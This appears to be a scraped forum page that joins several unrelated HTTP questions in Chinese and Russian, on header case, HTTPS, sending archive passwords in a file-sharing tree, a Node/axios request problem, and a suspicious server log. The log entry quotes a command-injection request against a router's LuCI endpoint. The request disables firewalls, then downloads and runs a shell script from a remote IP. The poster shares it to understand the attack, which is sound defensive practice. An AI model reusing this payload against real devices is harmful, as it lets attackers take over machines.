问题[http]

http header 中的小写和大写字母有区别吗？

例如两个标头：

test: 123
Test: 123

它们会被视为相同还是不同？

https 是什么？它与 http 有何不同？

我正在编写一个文件共享网站。它包含一个用于浏览服务器文件夹中文件的树。用户单击该文件夹，并向服务器发送一个请求GET，其中包含该文件夹路径的参数。服务器返回JSON此文件夹中文件结构的表示，并且用户“展开”此文件夹的树枝。如果用户选择的文件是存档，则服务器返回JSON存档中文件夹结构的表示。如果存档使用密码加密，服务器将返回错误并要求用户输入密码，以便向他显示存档的内容。

问题是：

1. 如何使用GET质询安全地传输密码？（我知道这是一个愚蠢的想法，但我希望你能提出另一种方法。这不适合PUT我使用）

2. 如果存档是嵌套的并且用户需要输入两个密码，如何保存上一个请求的密码？

# Исходное дерево:

+--- Root
|    +--- Folder 1
|    \--- File 1

# Пользователь нажал на "Folder 1"

+--- Root
|    +--- Folder 1
|    |    +--- Folder 2
|    |    |--- Archive 1
|    |    \--- Folder 3
|    \--- File 1


# Пользователь нажал на "Archive 1"
# Сервер попытался отобразить файлы "Archive 1"
# и оказалось, что он требует пароль
# Сервер возвращает "Forbidden" и перед
# пользователем появляется модальное окно с
# предложением ввести пароль. Пользователь
# вводит пароль и он отправляется (КАК?)
# вместе с запросом "GET".

+--- Root
|    +--- Folder 1
|    |    +--- Folder 2
|    |    |--- Archive 1
|    |    |    +--- Folder 4
|    |    |    |--- Archive 2
|    |    |    |--- File 2
|    |    |    \--- Folder 5
|    |    \--- Folder 3
|    \--- File 1


# Если сейчас пользователь нажмёт на
# "Archive 2", то у меня будут проблемы,
# потому что сервер обязан будет помнить
# пароль от первого архива и должен
# запросить пароль от второго архива.
# Каждый раз сервер начинает обход папок
# с корня "ROOT" как функция
# "scandir".

我应该将密码存储在服务器上吗？在会议中？强制用户立即输入密码列表？存储在js中？如何安全储存和运输？

REST 意识形态对这项任务有何看法？这是一个例外还是有一些好的解决方案？如果我在服务器上以明文形式存储密码，我应该多久清除一次用户会话？

我发现我们新奇的 IT 初创公司的公共服务器正在接收奇怪的请求，显然是某种自动请求。请解释一下这可能是什么？

[GIN] 2023/08/23 - 11:49:28 
| 404 |       6.885µs | ip клиента(палить не буду, локация США) 
| GET      "/cgi-bin/luci/;stok=/locale?
form=country&operation=write&country=$(cd%20/tmp
%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh
%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service
%3Bsystemctl%20stop%20firewalld%3Bservice
%20iptables%C2%A0stop%3Bwget%20http%3A
//(тут тоже был ip , локация Нидерланды)/zizuo.sh%3Bchmod
%20777%20zizuo.sh%3Bsh%20zizuo.sh)"

我应该分析情况吗（如果是，如何分析）？安全问题值得担心吗？我们对这些人回复 404 好吗？

这个问题是标准的，但我尝试了一堆解决方案。也许我在某处做错了什么，因此出现了问题。

重点：

最原始的服务器（甚至不处理任何东西）。

const http = require('http');

const server = http.createServer((request, response) => {
  response.end()
})

server.listen(4000);

我对此提出要求：

 axios.post('http://localhost:4000/')
  .then((response) => console.log(response))
  .catch((error) => console.log(error)
  );

进出我得到

在.htaccess中添加了各种各样的东西，没有任何帮助。

如何治疗？